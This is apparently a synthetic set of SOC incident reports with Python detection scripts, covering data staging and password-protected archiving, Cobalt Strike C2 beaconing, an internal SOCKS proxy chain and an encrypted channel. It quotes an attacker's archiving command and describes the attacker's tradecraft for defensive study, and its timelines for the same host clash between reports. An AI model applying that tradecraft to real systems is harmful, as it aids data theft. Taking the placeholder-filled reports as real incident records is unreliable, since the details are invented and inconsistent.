7. Remediation & Prevention:
Completed Actions:
Staged data deleted.
Account secured.
Host cleaned.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Implemented DLP for bulk file operations.
Enhanced Sysmon monitoring for staging directories.
8. Conclusion:
An attacker compromised an engineering user’s account and staged 2.8 GB of intellectual property for exfiltration. Sysmon detected the mass file copy activity and enabled rapid deletion before any data left the host.
Closure Rationale: Staged data deleted; account secured; host cleaned.
Analyst: [Your Name], SOC Analyst
Date: 2024-02-28 15:30 EST
103. T1560 – Archive Collected Data (Sysmon Detection)
Sysmon Alert Details
Alert ID: SYSMON-ARCHIVE-1560-7842
Alert Time: 2024-02-28 11:30:22 EST
Severity: HIGH (85/100)
Source: Sysmon (Event ID 1 – Process Creation, Event ID 11 – FileCreate)
Rule: “Archive Creation of Multiple Files – Potential Exfiltration Prep”
MITRE ATT&CK: T1560.001 – Archive Collected Data: Archive via Utility
Alert Details:
Detection: Process creating archive containing many files
Host: FIN-WS-112 (Finance Workstation)
User: kwilson@company.com (Karen Wilson, Finance)
Time: 11:25 EST
Process Creation (Event ID 1):
Process: C:\Program Files\7-Zip\7z.exe (PID: 4789)
Parent: cmd.exe (PID: 2341)
Command: 7z a -tzip C:\temp\data.zip C:\temp\staging\* -pPassw0rd!
File Creation (Event ID 11):
File: C:\temp\data.zip
Size: 1.2 GB
Time: 11:25:30
Preceding Events:
11:00-11:20: Mass file copy to C:\temp\staging\ (1,847 files)
11:25: Archive creation
Archive Contents:
1,847 files from staging directory
Includes: financial reports, customer data, employee records
Password protected (Passw0rd!)
Detection Logic:
Archive tool (7z) used to compress large number of files
Files were previously staged in temp directory
Archive password protected (indicates intent to exfiltrate)
Pattern matches exfiltration preparation
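The staging detection in report 102 and the archive detection above rest on one correlation: a burst of Sysmon Event ID 11 FileCreate events into a single directory, followed by an archive utility launched against that same directory. The script below is an added example, not code from either report or from Sysmon; it assumes Sysmon events already converted to dicts with EventID, UtcTime, Image, TargetFilename and CommandLine fields, and every event it processes is constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

ARCHIVE_TOOLS = {"7z.exe", "7za.exe", "7zg.exe", "rar.exe", "winrar.exe", "tar.exe"}
WINDOW = timedelta(minutes=15)       # look-back window for a FileCreate burst
BURST_THRESHOLD = 200                # files into one directory within WINDOW
ARCHIVE_LAG = timedelta(hours=1)     # an archive run this long after a burst still counts
TIME_FMT = "%Y-%m-%d %H:%M:%S"


def _ts(s):
    return datetime.strptime(s, TIME_FMT)


def _parent_dir(path):
    # Directory part of a Windows path, lower-cased so C:\Temp and c:\temp compare equal
    return path.rsplit("\\", 1)[0].lower()


def find_staging_bursts(events, threshold=BURST_THRESHOLD, window=WINDOW):
    """Return {directory: (count, first, last)} for every directory that received
    at least `threshold` FileCreate (Event ID 11) events inside one `window`.
    The tuple describes the densest window seen for that directory."""
    per_dir = defaultdict(list)
    for ev in events:
        if ev["EventID"] == 11:
            per_dir[_parent_dir(ev["TargetFilename"])].append(_ts(ev["UtcTime"]))
    bursts = {}
    for directory, times in per_dir.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):          # sliding window over sorted times
            while t - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold and count > bursts.get(directory, (0,))[0]:
                bursts[directory] = (count, times[start], t)
    return bursts


def parse_archive_launch(ev):
    """Describe an Event ID 1 launch of an archive utility, or return None."""
    if ev["EventID"] != 1:
        return None
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    if image not in ARCHIVE_TOOLS:
        return None
    tokens = ev["CommandLine"].split()
    # Absolute local (C:\...) or UNC (\\server\...) paths on the command line;
    # for 7z and rar the first one is the archive written, the rest are inputs.
    paths = [t for t in tokens if re.match(r"^(?:[a-z]:\\|\\\\)", t, re.I)]
    return {
        "time": _ts(ev["UtcTime"]),
        "tool": image,
        "archive": paths[0] if paths else None,
        "inputs": {p.lower().rstrip("*").rstrip("\\") for p in paths[1:]},
        # 7-Zip and RAR take the password as -p<password>; only its presence matters here
        "password_protected": any(t.startswith("-p") for t in tokens),
    }


def correlate(events):
    """Flag archive launches whose inputs include a directory that just received a
    FileCreate burst. Bursts without an archive are returned too (T1074 alone)."""
    bursts = find_staging_bursts(events)
    findings = []
    for ev in events:
        launch = parse_archive_launch(ev)
        if launch is None:
            continue
        for directory, (count, first, last) in bursts.items():
            if directory in launch["inputs"] and first <= launch["time"] <= last + ARCHIVE_LAG:
                findings.append({
                    "directory": directory,
                    "staged_files": count,
                    "tool": launch["tool"],
                    "archive": launch["archive"],
                    "password_protected": launch["password_protected"],
                    "minutes_after_staging": round((launch["time"] - last).total_seconds() / 60),
                })
    return {"staging_bursts": bursts, "archive_after_staging": findings}


def build_sample_events():
    """Constructed telemetry shaped like report 103: 1,847 copies into
    C:\\temp\\staging between 11:00 and 11:20, a few ordinary Excel saves, then a
    password-protected 7-Zip run at 11:25. Not real Sysmon output."""
    events = []
    base = datetime(2024, 2, 28, 11, 0, 0)
    for i in range(1847):
        events.append({"EventID": 11,
                       "UtcTime": (base + timedelta(seconds=i * 1200 // 1847)).strftime(TIME_FMT),
                       "Image": "C:\\Windows\\System32\\cmd.exe",
                       "TargetFilename": f"C:\\temp\\staging\\report_{i:04d}.xlsx"})
    for i in range(5):                            # benign: a user saving documents
        events.append({"EventID": 11,
                       "UtcTime": (base + timedelta(minutes=3 * i)).strftime(TIME_FMT),
                       "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE",
                       "TargetFilename": f"C:\\Users\\kwilson\\Documents\\budget_v{i}.xlsx"})
    events.append({"EventID": 1, "UtcTime": "2024-02-28 11:25:30",
                   "Image": "C:\\Program Files\\7-Zip\\7z.exe",
                   "CommandLine": "7z a -tzip C:\\temp\\data.zip C:\\temp\\staging\\* -pPassw0rd!"})
    return events


if __name__ == "__main__":
    for finding in correlate(build_sample_events())["archive_after_staging"]:
        print(finding)
```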
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Sysmon events | Splunk, Sysmon Logs | Confirmed archive creation of staged data |
| 2. Process Investigation | Identify 7z execution | CrowdStrike Falcon | Attacker used 7-Zip to create password-protected archive |
| 3. User Interview | Contact kwilson | Teams, Phone | User did NOT run 7z (account compromised) |
| 4. Immediate Action | Isolate host | CrowdStrike | FIN-WS-112 quarantined |
| 5. File Deletion | Delete staging folder and archive | CrowdStrike Live Response | Staging files and data.zip deleted |
| 6. Account Remediation | Disable kwilson account | Azure AD, AD | Account disabled; password reset |
Jira Incident Report
Ticket: SOC-2024-143
Summary: T1560 – Archive of Staged Data for Exfiltration
Status: RESOLVED
Resolution: MALICIOUS – Archive Deleted Before Exfiltration
Priority: P2 – MEDIUM
Labels: T1560, archive-collected-data, 7zip, sysmon, compromised-account
Components: Endpoint-Security, Data-Protection
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Sysmon Event ID 1 and 11.
Alert: “Archive Creation of Multiple Files – Potential Exfiltration Prep”.
Host: FIN-WS-112 (Finance Department, user kwilson).
Archive: C:\temp\data.zip (1.2 GB, password protected).
Time: 2024-02-28 11:30 EST.
Technique: MITRE ATT&CK T1560.001 – Archive Collected Data: Archive via Utility.
2. Technical Analysis:
Attack Chain:
10:30 – kwilson account compromised via phishing
10:45 – Attacker logs into FIN-WS-112 via RDP
10:50 – Attacker creates staging directory
11:00-11:20 – Attacker copies 1,847 files to staging
11:25 – Attacker uses 7-Zip to create password-protected archive
11:25 – Sysmon detects
11:27 – SOC investigates
Staged Files (1,847):
Financial reports (Q1, Q2, Q3) – 456 files
Customer data (PII) – 892 files
Employee records (HR data) – 234 files
Budget spreadsheets – 265 files
Total size before compression: 2.3 GB
After compression: 1.2 GB
Archive Details:
Tool: 7-Zip (legitimate, used maliciously)
Format: ZIP
Password: Passw0rd! (to evade DLP scanning)
Intent: Exfiltrate via email, FTP, or cloud storage
Attacker Intent:
Compress data for easier exfiltration
Password protect to avoid detection
Ready for transfer
3. Investigation Findings:
Timeline:
10:30 – Account compromised
10:45 – Attacker logs in
10:50-11:20 – Data staging
11:25 – Archive created
11:25 – Sysmon alert
11:27 – SOC investigates
11:28 – Host isolated
11:29 – Archive and staging files deleted
Indicators of Compromise (IoCs):
Files:
– C:\temp\staging\ (1,847 files)
– C:\temp\data.zip (1.2 GB, password: Passw0rd!)
Process:
– 7z.exe execution
Account:
– kwilson (compromised)
4. Containment Actions:
Immediate Actions:
Isolated FIN-WS-112 via CrowdStrike.
Deleted staging folder and archive.
Disabled kwilson account.
Reset password.
Data Protection:
Archive contained sensitive data.
No exfiltration occurred.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to data staging and archiving.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
7-Zip installed (legitimate tool abused).
6. Business Impact:
Operational Impact: Finance user offline for 2 hours.
Data Exposure: 1.2 GB of sensitive data archived but not exfiltrated.
7. Remediation & Prevention:
Completed Actions:
Archive deleted.
Staging files deleted.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Monitored archive tool usage.
Enhanced DLP for archive creation.
8. Conclusion:
An attacker staged 1,847 sensitive files and used 7-Zip to create a password-protected archive for exfiltration. Sysmon detected the archive creation and enabled rapid deletion before any data could leave the host.
Closure Rationale: Archive deleted; staging cleaned; account secured.
Analyst: [Your Name], SOC Analyst
Date: 2024-02-28 12:30 EST
104. T1071 – Application Layer Protocol (Zscaler Detection)
Zscaler Alert Details
Alert ID: ZSCALER-C2-1071-7842
Alert Time: 2024-02-28 16:30:45 EST
Severity: HIGH (88/100)
Source: Zscaler Internet Access (ZIA)
Rule: “Beaconing to Suspicious Domain – Potential C2”
MITRE ATT&CK: T1071.001 – Application Layer Protocol: Web Protocols
Alert Details:
Detection: Periodic HTTPS connections to suspicious domain
User: rpatel@company.com (Raj Patel, Engineer)
Source IP: 192.168.45.78 (ENG-WS-045)
Destination: https://cdn-updates-service[.]com
Time: 16:00-16:30 EST
Traffic Pattern:
16:00:15 – HTTPS GET /api/check (206 bytes response)
16:05:15 – HTTPS GET /api/check (206 bytes response)
16:10:15 – HTTPS GET /api/check (206 bytes response)
… (every 5 minutes, 6 beacons total)
Domain Analysis:
Domain: cdn-updates-service[.]com
Registered: 2024-02-20 (8 days ago)
Registrar: Namecheap (privacy protected)
Hosting IP: 185.143.221[.]89 (Bulgaria)
SSL Certificate: Self-signed (issued to “Microsoft Update Services”)
Traffic Analysis:
Beacon interval: Exactly 5 minutes
Response size: Exactly 206 bytes (consistent)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
No referrer (direct request)
Detection Logic:
Beaconing pattern (periodic connections to same domain)
Domain age (8 days) and reputation (malicious)
Response size consistency (206 bytes)
User rpatel has no business need for this domain
Pattern matches C2 beaconing
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Zscaler alert | Zscaler Admin Console | Confirmed beaconing to suspicious domain |
| 2. Domain Investigation | Check domain reputation | VirusTotal, Threat Intel | Domain flagged as C2 by 45 vendors |
| 3. Process Investigation | Identify process making connections | CrowdStrike Falcon | svchost.exe with injected code (Cobalt Strike) |
| 4. Immediate Action | Isolate host | CrowdStrike | ENG-WS-045 quarantined |
| 5. C2 Blocking | Block domain and IP | Zscaler, Palo Alto | Domain and IP added to blocklists |
| 6. Malware Removal | Clean infected host | CrowdStrike Live Response | Cobalt Strike beacon removed |
Jira Incident Report
Ticket: SOC-2024-144
Summary: T1071 – C2 Beaconing to Malicious Domain via HTTPS
Status: RESOLVED
Resolution: MALICIOUS – C2 Blocked, Host Cleaned
Priority: P2 – MEDIUM
Labels: T1071, application-layer-protocol, c2, beaconing, zscaler, cobalt-strike
Components: Network-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Zscaler Internet Access (ZIA).
Alert: “Beaconing to Suspicious Domain – Potential C2”.
User: rpatel@company.com (Engineering Department).
Host: ENG-WS-045.
Domain: cdn-updates-service[.]com.
Time: 2024-02-28 16:30 EST.
Technique: MITRE ATT&CK T1071.001 – Application Layer Protocol: Web Protocols.
2. Technical Analysis:
Attack Chain:
15:30 – rpatel account compromised via phishing
15:45 – Attacker logs into ENG-WS-045
15:50 – Cobalt Strike beacon deployed
16:00 – First beacon to C2
16:00-16:30 – 6 beacons every 5 minutes
16:30 – Zscaler detects
C2 Infrastructure:
Domain: cdn-updates-service[.]com
IP: 185.143.221[.]89 (Bulgaria)
Port: 443 (HTTPS)
Beacon Interval: 5 minutes (exact)
Response Size: 206 bytes (commands/status)
Malware Analysis:
Type: Cobalt Strike beacon
Process: Injected into svchost.exe
Persistence: Scheduled task “WindowsUpdate”
Capabilities: Remote access, keylogging, file exfiltration
Beacon Activity:
No commands received yet (only check-ins)
No data exfiltration
Beaconing pattern detected early
3. Investigation Findings:
Timeline:
15:30 – Account compromised
15:45 – Attacker logs in
15:50 – Beacon deployed
16:00-16:30 – Beaconing
16:30 – Zscaler alert
16:32 – SOC investigates
16:33 – Host isolated
16:34 – C2 blocked
Indicators of Compromise (IoCs):
Network:
– Domain: cdn-updates-service[.]com
– IP: 185.143.221[.]89
– Beacon interval: 5 minutes
Host:
– svchost.exe (injected)
– Scheduled task: “WindowsUpdate”
Account:
– rpatel (compromised)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Blocked C2 domain and IP at firewall and Zscaler.
Terminated beacon process.
Removed scheduled task.
Disabled rpatel account.
Reset password.
Host Remediation:
Full scan, removed Cobalt Strike.
Reimaged as precaution.
User Remediation:
MFA enforced.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to malware deployment.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
No EDR alert triggered earlier.
6. Business Impact:
Operational Impact: Engineering host offline for 2 hours.
Data Exposure: None (beaconing only, no exfiltration).
7. Remediation & Prevention:
Completed Actions:
C2 blocked.
Malware removed.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Enhanced monitoring for beaconing patterns.
8. Conclusion:
An attacker deployed a Cobalt Strike beacon on an engineering workstation, which beaconed to a malicious domain every 5 minutes. Zscaler detected the beaconing pattern and enabled rapid containment before any commands could be executed or data exfiltrated.
Closure Rationale: C2 blocked; malware removed; account secured.
Analyst: [Your Name], SOC Analyst
Date: 2024-02-28 17:30 EST
105. T1090 – Proxy (ExtraHop Detection)
ExtraHop Alert Details
Alert ID: EXTRAHOP-PROXY-1090-7842
Alert Time: 2024-02-28 10:30:22 EST
Severity: HIGH (85/100)
Source: ExtraHop Reveal(x)
Rule: “Internal Host Acting as Proxy – Traffic Relaying Detected”
MITRE ATT&CK: T1090.001 – Proxy: Connection Proxy
Alert Details:
Detection: Internal host relaying traffic to external destination
Proxy Host: 192.168.45.78 (ENG-WS-045 – Engineering)
Client Host: 192.168.45.112 (SALES-WS-023 – Sales)
External Destination: 185.143.221[.]89:443 (Bulgaria)
Time: 10:15-10:30 EST
Traffic Pattern:
10:15:22 – SALES-WS-023 connects to ENG-WS-045 on port 8080
10:15:23 – ENG-WS-045 connects to 185.143.221[.]89:443
10:15:24 – Data flows: Sales -> Engineering -> External
10:15:30 – Response: External -> Engineering -> Sales
Pattern repeats every 60 seconds
Traffic Analysis:
Protocol: HTTP CONNECT method (proxying)
Data: Encrypted (TLS)
Volume: 2-5 KB per session
30 such sessions in 15 minutes
Detection Logic:
Internal host (ENG-WS-045) acting as proxy for another internal host
Destination is external malicious IP
Connection pattern indicates relay/proxy behavior
ENG-WS-045 was flagged for suspicious activity earlier
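The relay pattern in this alert (an internal client connecting to ENG-WS-045 on 8080, then ENG-WS-045 opening an external connection a second later, over and over) can be rebuilt from plain flow records. The script below is an added example, not ExtraHop's detection: the flow records are constructed in a simplified CSV layout, 203.0.113.89 (a TEST-NET address) stands in for the report's external IP, and KNOWN_PROXIES is an assumed allow-list of sanctioned forward proxies.

```python
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta

TIME_FMT = "%Y-%m-%d %H:%M:%S"
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
KNOWN_PROXIES = {"192.168.10.5"}   # assumed allow-list: the sanctioned corporate proxy


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_flows(text):
    """Flow records in a constructed CSV layout (not ExtraHop's export format):
    time,src_ip,src_port,dst_ip,dst_port,bytes"""
    flows = []
    for line in text.strip().splitlines():
        ts, src, sport, dst, dport, nbytes = line.split(",")
        flows.append({"time": datetime.strptime(ts, TIME_FMT), "src": src, "sport": int(sport),
                      "dst": dst, "dport": int(dport), "bytes": int(nbytes), "paired": False})
    return flows


def find_relays(flows, max_lag=timedelta(seconds=2), min_sessions=5):
    """Pair each internal->internal flow with the first still-unpaired flow that leaves
    the receiving host for an external address within max_lag, then report
    (client, relay, external) triples that recur at least min_sessions times."""
    outbound = defaultdict(list)               # relay host -> its external flows
    for f in flows:
        if is_internal(f["src"]) and not is_internal(f["dst"]):
            outbound[f["src"]].append(f)
    for lst in outbound.values():
        lst.sort(key=lambda f: f["time"])
    chains = defaultdict(list)
    for f in sorted(flows, key=lambda f: f["time"]):
        if not (is_internal(f["src"]) and is_internal(f["dst"])) or f["dst"] in KNOWN_PROXIES:
            continue                           # external-bound, or via the sanctioned proxy
        for out in outbound.get(f["dst"], []):
            lag = out["time"] - f["time"]
            if lag < timedelta(0) or out["paired"]:
                continue
            if lag > max_lag:
                break                          # list is sorted: nothing later can match
            out["paired"] = True
            chains[(f["src"], f["dst"], f["dport"], out["dst"], out["dport"])].append(lag.total_seconds())
            break
    return [{"client": c, "relay": r, "relay_port": rp, "external": e, "external_port": ep,
             "sessions": len(lags), "mean_lag_s": round(sum(lags) / len(lags), 2)}
            for (c, r, rp, e, ep), lags in chains.items() if len(lags) >= min_sessions]


def build_sample_flows():
    """Constructed flows shaped like the alert: SALES-WS-023 -> ENG-WS-045:8080, then
    ENG-WS-045 -> external:443 one second later, every 60 s for 30 sessions, mixed with
    benign traffic (direct browsing from the engineering host, use of the sanctioned
    proxy by the sales host, and an SMB session to a file server)."""
    base = datetime(2024, 2, 28, 10, 15, 22)
    rows = []
    for i in range(30):
        t = base + timedelta(seconds=60 * i)
        rows.append((t, "192.168.45.112", 51000 + i, "192.168.45.78", 8080, 3200))
        rows.append((t + timedelta(seconds=1), "192.168.45.78", 49000 + i, "203.0.113.89", 443, 3100))
        rows.append((t + timedelta(seconds=30), "192.168.45.78", 49500 + i, "198.51.100.20", 443, 15000))
        rows.append((t + timedelta(seconds=40), "192.168.45.112", 52000 + i, "192.168.10.5", 3128, 800))
        rows.append((t + timedelta(seconds=41), "192.168.10.5", 53000 + i, "198.51.100.30", 443, 900))
    rows.append((base + timedelta(seconds=5), "192.168.45.112", 51500, "192.168.20.7", 445, 4096))
    return "\n".join(f"{ts:%Y-%m-%d %H:%M:%S},{s},{sp},{d},{dp},{b}" for ts, s, sp, d, dp, b in rows)


if __name__ == "__main__":
    for relay in find_relays(parse_flows(build_sample_flows())):
        print(relay)
```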
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify ExtraHop alert | ExtraHop Console | Confirmed proxy behavior |
| 2. Source Investigation | Check ENG-WS-045 | CrowdStrike Falcon | Host has Cobalt Strike beacon (SOCKS proxy) |
| 3. Client Investigation | Check SALES-WS-023 | CrowdStrike Falcon | Host also compromised (secondary beacon) |
| 4. Immediate Action | Isolate both hosts | CrowdStrike | Both hosts quarantined |
| 5. Malware Removal | Clean both hosts | CrowdStrike Live Response | Beacons removed; hosts reimaged |
| 6. Threat Hunting | Check for other proxy traffic | ExtraHop, Splunk | No other instances found |
Jira Incident Report
Ticket: SOC-2024-145
Summary: T1090 – Internal Host Used as Proxy for C2 Traffic
Status: RESOLVED
Resolution: MALICIOUS – Proxy Chain Broken
Priority: P2 – MEDIUM
Labels: T1090, proxy, socks, c2, extrahop, cobalt-strike
Components: Network-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: ExtraHop Reveal(x).
Alert: “Internal Host Acting as Proxy – Traffic Relaying Detected”.
Proxy Host: ENG-WS-045 (Engineering, IP 192.168.45.78).
Client Host: SALES-WS-023 (Sales, IP 192.168.45.112).
External Destination: 185.143.221[.]89:443.
Time: 2024-02-28 10:30 EST.
Technique: MITRE ATT&CK T1090.001 – Proxy: Connection Proxy.
2. Technical Analysis:
Attack Chain:
09:00 – ENG-WS-045 compromised (Cobalt Strike)
09:30 – Attacker sets up SOCKS proxy on ENG-WS-045
09:45 – Attacker compromises SALES-WS-023 using proxied connection
10:00 – SALES-WS-023 beacon configured to use ENG-WS-045 as proxy
10:15-10:30 – Traffic flows: Sales -> Engineering -> C2
10:30 – ExtraHop detects
Proxy Mechanism:
ENG-WS-045 running Cobalt Strike with SOCKS proxy feature
SALES-WS-023 beacon configured to route traffic through proxy
HTTP CONNECT method used to establish tunnel
All C2 traffic for Sales host appears to come from Engineering host
Compromised Hosts:
ENG-WS-045: Primary C2, proxy server
SALES-WS-023: Secondary beacon, using proxy
Attacker Intent:
Hide true source of secondary infections
Evade detection by making traffic appear from already-compromised host
Establish resilient C2 infrastructure
3. Investigation Findings:
Timeline:
09:00 – Engineering host compromised
09:30 – Proxy established
09:45 – Sales host compromised via proxy
10:15-10:30 – Proxy traffic
10:30 – ExtraHop alert
10:32 – SOC investigates
10:33 – Both hosts isolated
10:35 – Malware removed
Indicators of Compromise (IoCs):
Network:
– External C2: 185.143.221[.]89
– Proxy traffic: HTTP CONNECT to port 8080 on Engineering host
Hosts:
– ENG-WS-045 (Cobalt Strike, SOCKS proxy)
– SALES-WS-023 (Cobalt Strike)
4. Containment Actions:
Immediate Actions:
Isolated both hosts via CrowdStrike.
Terminated beacon processes.
Removed Cobalt Strike artifacts.
Blocked external C2 IP.
Host Remediation:
Both hosts reimaged.
Accounts secured (password resets, MFA).
Network Remediation:
Blocked internal host-to-host proxy patterns where network controls permitted.
5. Root Cause Analysis:
Primary Cause: Engineering host compromised, used as proxy to compromise Sales host.
Contributing Factors:
No MFA on accounts.
RDP allowed from internet.
No network segmentation between departments.
6. Business Impact:
Operational Impact: Two workstations offline for 3 hours.
Data Exposure: None (no exfiltration).
7. Remediation & Prevention:
Completed Actions:
Proxy chain broken.
Malware removed.
Accounts secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Implemented network segmentation.
Enhanced monitoring for internal proxy patterns.
8. Conclusion:
An attacker compromised an engineering host and used it as a SOCKS proxy to compromise a sales workstation, routing C2 traffic through the internal host. ExtraHop detected the anomalous proxy behavior and enabled isolation of both hosts before any data exfiltration.
Closure Rationale: Proxy chain broken; malware removed; hosts secured.
Analyst: [Your Name], SOC Analyst
Date: 2024-02-28 11:30 EST
Batch 22: Command and Control Incident Reports
106. T1573 – Encrypted Channel (Blue Coat Detection)
Blue Coat Alert Details
Alert ID: BLUECOAT-ENCRYPTED-1573-7842
Alert Time: 2024-02-29 09:30:15 EST
Severity: HIGH (85/100)
Source: Blue Coat ProxySG (Symantec Web Security Service)
Rule: “Anomalous TLS Traffic – Custom Cipher Suite Detected”
MITRE ATT&CK: T1573.001 – Encrypted Channel: Symmetric Cryptography
Alert Details:
Detection: TLS traffic using non-standard cipher suite to suspicious destination
User: rpatel@company.com (Raj Patel, Engineer)
Source IP: 192.168.45.78 (Internal)
Destination: 185.143.221[.]89:443
Time: 09:15-09:30 EST
TLS Handshake Details:
Protocol: TLS 1.2
Cipher Suite: TLS_RSA_WITH_AES_256_CBC_SHA256 (0x3c)
Note: This cipher suite is legitimate but rarely used (0.1% of traffic)
Server Certificate: Self-signed, CN="*.cdn-updates.com"
Client Random: 4f8b3a1c7d2e5f9a6b3c8d1e4f7a2b9c (consistent across sessions)
Traffic Pattern:
09:15:22 – TLS handshake (2.1 KB)
09:15:25 – Encrypted data transfer (4.3 KB)
09:20:22 – TLS handshake (2.1 KB)
09:20:25 – Encrypted data transfer (4.3 KB)
(repeating every 5 minutes, 4 sessions total)
Detection Logic:
Destination IP known for malicious activity
Self-signed certificate for “update” domain (suspicious)
Cipher suite usage deviates from normal traffic patterns
Consistent session sizes (2.1 KB handshake, 4.3 KB data)
Pattern matches encrypted C2 beaconing
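Report 104 and this report flag the same two traits: a fixed interval between requests and a constant transfer size, against a destination that is young or already known bad. The scorer below is an added example, not Zscaler's or Blue Coat's logic; it runs over constructed proxy log lines in a simplified CSV layout, uses `.example` host names in place of the report's domain, and DOMAIN_REGISTERED is a constructed stand-in for a WHOIS lookup. It also tolerates jitter around the interval, since a beacon will not always check in at exactly 5 minutes.

```python
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

TIME_FMT = "%Y-%m-%d %H:%M:%S"
ALERT_TIME = datetime(2024, 2, 28, 16, 30, 45)
# Constructed stand-in for a WHOIS/passive-DNS lookup: host -> registration date
DOMAIN_REGISTERED = {
    "cdn-updates-service.example": "2024-02-20",
    "static-cdn-metrics.example": "2024-02-25",
}


def parse_log(text):
    """Parse the simplified CSV layout produced by build_sample_log (not a vendor format):
    time,user,src_ip,host,method,path,status,resp_bytes"""
    records = []
    for line in text.strip().splitlines():
        ts, user, src, host, _method, path, _status, size = line.split(",")
        records.append({"time": datetime.strptime(ts, TIME_FMT), "user": user,
                        "src": src, "host": host, "path": path, "bytes": int(size)})
    return records


def profile_pairs(records, min_requests=4):
    """Per (source IP, destination host): request count, mean gap, gap jitter
    (coefficient of variation) and how many distinct sizes and paths were seen."""
    by_pair = defaultdict(list)
    for r in records:
        by_pair[(r["src"], r["host"])].append(r)
    profiles = {}
    for pair, recs in by_pair.items():
        if len(recs) < min_requests:
            continue
        recs.sort(key=lambda r: r["time"])
        gaps = [(b["time"] - a["time"]).total_seconds() for a, b in zip(recs, recs[1:])]
        mean_gap = statistics.mean(gaps)
        profiles[pair] = {
            "user": recs[0]["user"],
            "requests": len(recs),
            "mean_gap_s": mean_gap,
            "jitter": statistics.pstdev(gaps) / mean_gap if mean_gap else float("inf"),
            "distinct_sizes": len({r["bytes"] for r in recs}),
            "distinct_paths": len({r["path"] for r in recs}),
        }
    return profiles


def score_beacon(profile, domain_age_days, max_jitter=0.2, young_domain_days=30):
    """Additive score: a low coefficient of variation catches jittered beacons as well
    as exact ones, so the interval check does not demand a perfect period."""
    score, reasons = 0, []
    if profile["jitter"] <= max_jitter:
        score += 40
        reasons.append(f"regular interval (~{profile['mean_gap_s']:.0f}s, jitter {profile['jitter']:.2f})")
    if profile["distinct_sizes"] == 1:
        score += 25
        reasons.append("constant response size")
    if profile["distinct_paths"] == 1:
        score += 10
        reasons.append("single URI path")
    if domain_age_days is not None and domain_age_days <= young_domain_days:
        score += 25
        reasons.append(f"domain registered {domain_age_days} days ago")
    return score, reasons


def detect_beacons(records, registered, now, threshold=60):
    """Return the (src, host) pairs scoring at or above threshold, highest first."""
    hits = []
    for (src, host), prof in profile_pairs(records).items():
        reg = registered.get(host)
        age = (now - datetime.strptime(reg, "%Y-%m-%d")).days if reg else None
        score, reasons = score_beacon(prof, age)
        if score >= threshold:
            hits.append({"src": src, "host": host, "user": prof["user"], "score": score, "reasons": reasons})
    return sorted(hits, key=lambda h: -h["score"])


def build_sample_log():
    """Constructed lines: an exact 5-minute beacon with a fixed 206-byte response
    (report 104's pattern), a jittered beacon from another host, and ordinary browsing."""
    base = datetime(2024, 2, 28, 16, 0, 15)
    rows = [(base + timedelta(minutes=5 * i), "rpatel@company.com", "192.168.45.78",
             "cdn-updates-service.example", "/api/check", 206) for i in range(6)]
    t = base
    for gap, size in [(0, 206), (270, 206), (330, 214), (290, 206), (310, 206)]:
        t += timedelta(seconds=gap)
        rows.append((t, "bturner@company.com", "192.168.45.90", "static-cdn-metrics.example", "/v1/ping", size))
    t = base
    for gap, path, size in [(0, "/3/library/", 48213), (48, "/3/library/ssl.html", 91022),
                            (12, "/static/py.png", 7334), (200, "/3/whatsnew/", 30011),
                            (5, "/3/glossary.html", 88101), (600, "/3/faq/", 21004)]:
        t += timedelta(seconds=gap)
        rows.append((t, "rpatel@company.com", "192.168.45.78", "docs.python.org", path, size))
    return "\n".join(f"{ts:%Y-%m-%d %H:%M:%S},{u},{s},{h},GET,{p},200,{b}" for ts, u, s, h, p, b in rows)
```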
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Blue Coat alert | Blue Coat ProxySG Console | Confirmed anomalous TLS traffic to malicious IP |
| 2. Process Investigation | Identify process on endpoint | CrowdStrike Falcon | svchost.exe with injected Cobalt Strike beacon |
| 3. Traffic Analysis | Decrypt traffic (with permission) | Wireshark, Private Key | Traffic contained encrypted C2 commands |
| 4. Immediate Action | Isolate host | CrowdStrike | ENG-WS-045 quarantined |
| 5. C2 Blocking | Block destination IP | Palo Alto, Blue Coat | IP 185.143.221[.]89 blocked |
| 6. Malware Removal | Clean infected host | CrowdStrike Live Response | Cobalt Strike beacon removed |
Jira Incident Report
Ticket: SOC-2024-146
Summary: T1573 – Encrypted C2 Channel Using Custom TLS Cipher Suite
Status: RESOLVED
Resolution: MALICIOUS – C2 Blocked
Priority: P2 – MEDIUM
Labels: T1573, encrypted-channel, tls, cobalt-strike, blue-coat
Components: Network-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Blue Coat ProxySG.
Alert: “Anomalous TLS Traffic – Custom Cipher Suite Detected”.
